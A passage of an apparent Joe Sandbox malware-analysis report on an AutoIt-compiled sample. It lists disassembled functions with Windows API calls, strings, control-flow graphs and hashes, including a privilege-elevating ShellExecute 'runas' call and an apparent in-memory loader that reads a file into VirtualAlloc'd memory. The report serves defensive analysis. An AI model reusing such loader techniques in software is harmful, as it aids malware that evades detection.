                                                                    • LockResource.KERNEL32(008E50AA,?,?,008E50AA,?,?,00000000,00000000,?,?,?,?,?,?,008E4F20,?), ref: 009235E6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                    • String ID: SCRIPT
                                                                    • API String ID: 3051347437-3967369404
                                                                    • Opcode ID: 15b357c303f6fee8be88a3c7a20a76786c0ccee08f45a49234efe3b1c0df2225
                                                                    • Instruction ID: 590c1de4852fdfe1458c5ed16eb2fdb8e6ac4c7853d34a2e057876c0959eacdc
                                                                    • Opcode Fuzzy Hash: 15b357c303f6fee8be88a3c7a20a76786c0ccee08f45a49234efe3b1c0df2225
                                                                    • Instruction Fuzzy Hash: 67117CB1200701BFD7218B66DC48F677BB9EBC6B51F14816DB51AD6260DBB2D8409620
                                                                    Function 00922BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008E2B6B
                                                                      • Part of subcall function 008E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009B1418,?,008E2E7F,?,?,?,00000000), ref: 008E3A78
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • GetForegroundWindow.USER32(runas,?,?,?,?,?,009A2224), ref: 00922C10
                                                                    • ShellExecuteW.SHELL32(00000000,?,?,009A2224), ref: 00922C17
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                    • String ID: runas
                                                                    • API String ID: 448630720-4000483414
                                                                    • Opcode ID: 6be2afdb4a999b44c8bba506016fa8d1a11c15799720dd83d882eb9f089a16fd
                                                                    • Instruction ID: d6d2c85ba532d3c0591ee8d83147d0cabd1a42942c63eadf50503f760bbb7c86
                                                                    • Opcode Fuzzy Hash: 6be2afdb4a999b44c8bba506016fa8d1a11c15799720dd83d882eb9f089a16fd
                                                                    • Instruction Fuzzy Hash: 7811D231208381AAC714FF2AE8559AE77A9FBD3760F84042CF086931B2DF208A499753
                                                                    Function 0094DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,00925222), ref: 0094DBCE
                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 0094DBDD
                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 0094DBEE
                                                                    • FindClose.KERNEL32(00000000), ref: 0094DBFA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                    • String ID:
                                                                    • API String ID: 2695905019-0
                                                                    • Opcode ID: d1996a6f6cd9909c90a15a28f04fb7335d7b259b423898e3be31ef7f940fefd9
                                                                    • Instruction ID: ea371f120befd5f862a0426e6c7c35ae878b0ae6b200ab34c321be242d06b6e7
                                                                    • Opcode Fuzzy Hash: d1996a6f6cd9909c90a15a28f04fb7335d7b259b423898e3be31ef7f940fefd9
                                                                    • Instruction Fuzzy Hash: BCF023714295105782216FBCDC4DC6A376C9F02339B504716F479C10F0EBB09DD4D6D5
                                                                    Function 008ED730 Relevance: 21.6, APIs: 14, Instructions: 618windowsleeptimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetInputState.USER32 ref: 008ED807
                                                                    • timeGetTime.WINMM ref: 008EDA07
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008EDB28
                                                                    • TranslateMessage.USER32(?), ref: 008EDB7B
                                                                    • DispatchMessageW.USER32(?), ref: 008EDB89
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008EDB9F
                                                                    • Sleep.KERNEL32(0000000A), ref: 008EDBB1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                    • String ID:
                                                                    • API String ID: 2189390790-0
                                                                    • Opcode ID: 0c3f2acc7ddb77de14f51a5b5125cfed35bd8f4dce76f89d26668fedd4d8cb7a
                                                                    • Instruction ID: 606a4f97238b29dd2b4339b2846161f1523580555396fbf6b47f8476b19d9345
                                                                    • Opcode Fuzzy Hash: 0c3f2acc7ddb77de14f51a5b5125cfed35bd8f4dce76f89d26668fedd4d8cb7a
                                                                    • Instruction Fuzzy Hash: 2542C070608385AFD728DF25C844B6ABBE4FF86314F14862DE595CB292D774E848DF82
                                                                    Function 008E2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 008E2D07
                                                                    • RegisterClassExW.USER32(00000030), ref: 008E2D31
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E2D42
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 008E2D5F
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008E2D6F
                                                                    • LoadIconW.USER32(000000A9), ref: 008E2D85
                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008E2D94
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: 84bd0ba942810d32877fe66d4df557deba8be7217076e6e9bb714000d892588b
                                                                    • Instruction ID: 942c88f49fb453c701acbbc8653048d6ad21f8bf8af2fc02d832067247881dd9
                                                                    • Opcode Fuzzy Hash: 84bd0ba942810d32877fe66d4df557deba8be7217076e6e9bb714000d892588b
                                                                    • Instruction Fuzzy Hash: C62124B2925348AFDB00DFA4ED59BDDBBB4FB08711F00821AF615A62A0D7B00584EF90
                                                                    Function 0092065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 302 92065b-92068b call 92042f 305 9206a6-9206b2 call 915221 302->305 306 92068d-920698 call 90f2c6 302->306 311 9206b4-9206c9 call 90f2c6 call 90f2d9 305->311 312 9206cb-920714 call 92039a 305->312 313 92069a-9206a1 call 90f2d9 306->313 311->313 321 920781-92078a GetFileType 312->321 322 920716-92071f 312->322 323 92097d-920983 313->323 324 9207d3-9207d6 321->324 325 92078c-9207bd GetLastError call 90f2a3 CloseHandle 321->325 327 920721-920725 322->327 328 920756-92077c GetLastError call 90f2a3 322->328 330 9207d8-9207dd 324->330 331 9207df-9207e5 324->331 325->313 339 9207c3-9207ce call 90f2d9 325->339 327->328 332 920727-920754 call 92039a 327->332 328->313 335 9207e9-920837 call 91516a 330->335 331->335 336 9207e7 331->336 332->321 332->328 345 920847-92086b call 92014d 335->345 346 920839-920845 call 9205ab 335->346 336->335 339->313 352 92087e-9208c1 345->352 353 92086d 345->353 346->345 351 92086f-920879 call 9186ae 346->351 351->323 355 9208e2-9208f0 352->355 356 9208c3-9208c7 352->356 353->351 359 9208f6-9208fa 355->359 360 92097b 355->360 356->355 358 9208c9-9208dd 356->358 358->355 359->360 361 9208fc-92092f CloseHandle call 92039a 359->361 360->323 364 920963-920977 361->364 365 920931-92095d GetLastError call 90f2a3 call 915333 361->365 364->360 365->364
                                                                    APIs
                                                                      • Part of subcall function 0092039A: CreateFileW.KERNELBASE(00000000,00000000,?,00920704,?,?,00000000,?,00920704,00000000,0000000C), ref: 009203B7
                                                                    • GetLastError.KERNEL32 ref: 0092076F
                                                                    • __dosmaperr.LIBCMT ref: 00920776
                                                                    • GetFileType.KERNELBASE(00000000), ref: 00920782
                                                                    • GetLastError.KERNEL32 ref: 0092078C
                                                                    • __dosmaperr.LIBCMT ref: 00920795
                                                                    • CloseHandle.KERNEL32(00000000), ref: 009207B5
                                                                    • CloseHandle.KERNEL32(?), ref: 009208FF
                                                                    • GetLastError.KERNEL32 ref: 00920931
                                                                    • __dosmaperr.LIBCMT ref: 00920938
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                    • String ID: H
                                                                    • API String ID: 4237864984-2852464175
                                                                    • Opcode ID: 3099861adfad2524f7d0324181fb61fc7d755f688709e6821afeb760b9572a5a
                                                                    • Instruction ID: d3af1514111fb37a028cea2d529a03655bb4e0ef0baac0ec9ad1ac26d435c06e
                                                                    • Opcode Fuzzy Hash: 3099861adfad2524f7d0324181fb61fc7d755f688709e6821afeb760b9572a5a
                                                                    • Instruction Fuzzy Hash: 7EA14632A141188FDF19EF68EC51BAE3BA4AB86320F14025DF8159B3D2D7319D53DB91
                                                                    Function 008E344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 008E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009B1418,?,008E2E7F,?,?,?,00000000), ref: 008E3A78
                                                                      • Part of subcall function 008E3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008E3379
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008E356A
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0092318D
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009231CE
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00923210
                                                                    • _wcslen.LIBCMT ref: 00923277
                                                                    • _wcslen.LIBCMT ref: 00923286
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                    • API String ID: 98802146-2727554177
                                                                    • Opcode ID: 6f5cbc7eec342a32e8439cd8a4a65b21af86e18e44058f290de23f28d47a20d9
                                                                    • Instruction ID: 9f3d67021182b9fc4cf99519f472f2421a1779927b8b7a5d164beca65aa40188
                                                                    • Opcode Fuzzy Hash: 6f5cbc7eec342a32e8439cd8a4a65b21af86e18e44058f290de23f28d47a20d9
                                                                    • Instruction Fuzzy Hash: 9071F3714183009FC314EF29ED8596BBBE8FF86B50F404A2EF555C71A0EB349A48CB62
                                                                    Function 008E2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 008E2B8E
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 008E2B9D
                                                                    • LoadIconW.USER32(00000063), ref: 008E2BB3
                                                                    • LoadIconW.USER32(000000A4), ref: 008E2BC5
                                                                    • LoadIconW.USER32(000000A2), ref: 008E2BD7
                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008E2BEF
                                                                    • RegisterClassExW.USER32(?), ref: 008E2C40
                                                                      • Part of subcall function 008E2CD4: GetSysColorBrush.USER32(0000000F), ref: 008E2D07
                                                                      • Part of subcall function 008E2CD4: RegisterClassExW.USER32(00000030), ref: 008E2D31
                                                                      • Part of subcall function 008E2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E2D42
                                                                      • Part of subcall function 008E2CD4: InitCommonControlsEx.COMCTL32(?), ref: 008E2D5F
                                                                      • Part of subcall function 008E2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008E2D6F
                                                                      • Part of subcall function 008E2CD4: LoadIconW.USER32(000000A9), ref: 008E2D85
                                                                      • Part of subcall function 008E2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008E2D94
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                    • String ID: #$0$AutoIt v3
                                                                    • API String ID: 423443420-4155596026
                                                                    • Opcode ID: 02c18ddbf7a77d5e1e5a9b13ceaf9124a8c649b26283ab428a54dded4441d813
                                                                    • Instruction ID: 2091659c7797e0a9ca701049402cba64085626fc5782115fc8cf22f34a2e36a1
                                                                    • Opcode Fuzzy Hash: 02c18ddbf7a77d5e1e5a9b13ceaf9124a8c649b26283ab428a54dded4441d813
                                                                    • Instruction Fuzzy Hash: 632150B2E28354AFDB109FA5ED65B9D7FF4FB08B60F50011AF504A66A0E7B10540EF90
                                                                    Function 008E3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 443 8e3170-8e3185 444 8e3187-8e318a 443->444 445 8e31e5-8e31e7 443->445 446 8e318c-8e3193 444->446 447 8e31eb 444->447 445->444 448 8e31e9 445->448 449 8e3199-8e319e 446->449 450 8e3265-8e326d PostQuitMessage 446->450 452 922dfb-922e23 call 8e18e2 call 8fe499 447->452 453 8e31f1-8e31f6 447->453 451 8e31d0-8e31d8 DefWindowProcW 448->451 455 8e31a4-8e31a8 449->455 456 922e7c-922e90 call 94bf30 449->456 458 8e3219-8e321b 450->458 457 8e31de-8e31e4 451->457 488 922e28-922e2f 452->488 459 8e321d-8e3244 SetTimer RegisterWindowMessageW 453->459 460 8e31f8-8e31fb 453->460 462 8e31ae-8e31b3 455->462 463 922e68-922e72 call 94c161 455->463 456->458 481 922e96 456->481 458->457 459->458 464 8e3246-8e3251 CreatePopupMenu 459->464 466 922d9c-922d9f 460->466 467 8e3201-8e3214 KillTimer call 8e30f2 call 8e3c50 460->467 471 8e31b9-8e31be 462->471 472 922e4d-922e54 462->472 477 922e77 463->477 464->458 474 922da1-922da5 466->474 475 922dd7-922df6 MoveWindow 466->475 467->458 479 8e31c4-8e31ca 471->479 480 8e3253-8e3263 call 8e326f 471->480 472->451 484 922e5a-922e63 call 940ad7 472->484 482 922dc6-922dd2 SetFocus 474->482 483 922da7-922daa 474->483 475->458 477->458 479->451 479->488 480->458 481->451 482->458 483->479 489 922db0-922dc1 call 8e18e2 483->489 484->451 488->451 492 922e35-922e48 call 8e30f2 call 8e3837 488->492 489->458 492->451
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,008E316A,?,?), ref: 008E31D8
                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,008E316A,?,?), ref: 008E3204
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008E3227
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,008E316A,?,?), ref: 008E3232
                                                                    • CreatePopupMenu.USER32 ref: 008E3246
                                                                    • PostQuitMessage.USER32(00000000), ref: 008E3267
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                    • String ID: TaskbarCreated
                                                                    • API String ID: 129472671-2362178303
                                                                    • Opcode ID: 5f172ea2d768d8073740e7fa9d80ca0c702c01c6ee9597798a5e84b0f1037fcc
                                                                    • Instruction ID: 43001c6661ee0fb79b3c2dca610f06b8dac180e24d1d92eaf9c5af852f09858d
                                                                    • Opcode Fuzzy Hash: 5f172ea2d768d8073740e7fa9d80ca0c702c01c6ee9597798a5e84b0f1037fcc
                                                                    • Instruction Fuzzy Hash: 78419C31228284B7DB291B39AE1DBB93659F747355F44022DF646C72A1DB70CE40A762
                                                                    Function 00BE1D98 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 499 be1d98-be1e46 call bdf7c8 502 be1e4d-be1e73 call be2ca8 CreateFileW 499->502 505 be1e7a-be1e8a 502->505 506 be1e75 502->506 513 be1e8c 505->513 514 be1e91-be1eab VirtualAlloc 505->514 507 be1fc5-be1fc9 506->507 509 be200b-be200e 507->509 510 be1fcb-be1fcf 507->510 515 be2011-be2018 509->515 511 be1fdb-be1fdf 510->511 512 be1fd1-be1fd4 510->512 516 be1fef-be1ff3 511->516 517 be1fe1-be1feb 511->517 512->511 513->507 518 be1ead 514->518 519 be1eb2-be1ec9 ReadFile 514->519 520 be206d-be2082 515->520 521 be201a-be2025 515->521 524 be1ff5-be1fff 516->524 525 be2003 516->525 517->516 518->507 526 be1ecb 519->526 527 be1ed0-be1f10 VirtualAlloc 519->527 522 be2084-be208f VirtualFree 520->522 523 be2092-be209a 520->523 528 be2029-be2035 521->528 529 be2027 521->529 522->523 524->525 525->509 526->507 530 be1f17-be1f32 call be2ef8 527->530 531 be1f12 527->531 532 be2049-be2055 528->532 533 be2037-be2047 528->533 529->520 539 be1f3d-be1f47 530->539 531->507 535 be2057-be2060 532->535 536 be2062-be2068 532->536 534 be206b 533->534 534->515 535->534 536->534 540 be1f7a-be1f8e call be2d08 539->540 541 be1f49-be1f78 call be2ef8 539->541 547 be1f92-be1f96 540->547 548 be1f90 540->548 541->539 549 be1f98-be1f9c CloseHandle 547->549 550 be1fa2-be1fa6 547->550 548->507 549->550 551 be1fa8-be1fb3 VirtualFree 550->551 552 be1fb6-be1fbf 550->552 551->552 552->502 552->507
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00BE1E69
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BE208F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743712764.0000000000BDF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BDF000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bdf000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 204039940-0
                                                                    • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                    • Instruction ID: b2e8d152aa520e450851ea668f83595049d767fb9e37855240a2c23f594d1c58
                                                                    • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                    • Instruction Fuzzy Hash: B4A13870E00249EBDB14CFA5C994BEEBBB5FF48305F208599E501BB281D7759A40DFA4
                                                                    Function 008E2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 563 8e2c63-8e2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                    APIs
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008E2C91
                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008E2CB2
                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,008E1CAD,?), ref: 008E2CC6
                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,008E1CAD,?), ref: 008E2CCF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateShow
                                                                    • String ID: AutoIt v3$edit
                                                                    • API String ID: 1584632944-3779509399
                                                                    • Opcode ID: 36115414f1aedd1dba3c5a2729b77aa5b5e4ebda1e4cbf6e0d7cd52b17d6dd7a
                                                                    • Instruction ID: 15c70c90bf6f24a7f16b94de93a170a7267747b000f2fc078c7a79d1d03c726c
                                                                    • Opcode Fuzzy Hash: 36115414f1aedd1dba3c5a2729b77aa5b5e4ebda1e4cbf6e0d7cd52b17d6dd7a
                                                                    • Instruction Fuzzy Hash: DFF03AB66642907AEB300723AC18E772EFDD7C6F60F54411EFA04A21A0E6610840EBB0
                                                                    Function 00BE1B78 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 142fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 678 be1b78-be1c9a call bdf7c8 call be1a68 CreateFileW 685 be1c9c 678->685 686 be1ca1-be1cb1 678->686 687 be1d51-be1d56 685->687 689 be1cb8-be1cd2 VirtualAlloc 686->689 690 be1cb3 686->690 691 be1cd6-be1ced ReadFile 689->691 692 be1cd4 689->692 690->687 693 be1cef 691->693 694 be1cf1-be1d2b call be1aa8 call be0a68 691->694 692->687 693->687 699 be1d2d-be1d42 call be1af8 694->699 700 be1d47-be1d4f ExitProcess 694->700 699->700 700->687
                                                                    APIs
                                                                      • Part of subcall function 00BE1A68: Sleep.KERNELBASE(000001F4), ref: 00BE1A79
